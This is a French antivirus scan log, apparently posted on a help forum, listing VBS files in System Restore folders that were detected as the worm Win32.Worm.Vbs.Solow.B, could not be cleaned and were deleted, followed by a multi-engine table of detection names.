                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142608.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142649.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142720.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142833.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0143001.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143064.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144404.vbs=>(unicode)
                                        Supprimé

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                                        Echec de la désinfection

                                        H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                                        Supprimé

                                        Résultat virusscan
                                        Scanner Malware name
                                        A-Squared X
                                        AntiVir JB
                                        ArcaVir Trojan.Sdbot.Bti
                                        Avast Zombie-2413
                                        AVG Antivirus Darth_Vader
                                        BitDefender Zombie.2413
                                        ClamAV DarthVader
                                        CPsecure X
                                        Dr.Web JB.dropper.2413
                                        F-Prot Antivirus Zombie.2413
                                        F-Secure Anti-Virus Virus.DOS.Zombie.2413
                                        Fortinet Zombie.2413
                                        Kaspersky Anti-Virus Virus.DOS.Zombie.2413
                                        NOD32 probably unknown CRYPT.TSR.COM.EXE
                                        Norman Virus Control X
                                        Panda Antivirus Zombie.2413
                                        Rising Antivirus Trojan.VB.mn
                                        Sophos Antivirus Zombie-2413
                                        VirusBuster Zombie.2413
                                        VBA32 Email-Worm.VBS.Lee-based
                                        • 1
                                        • 2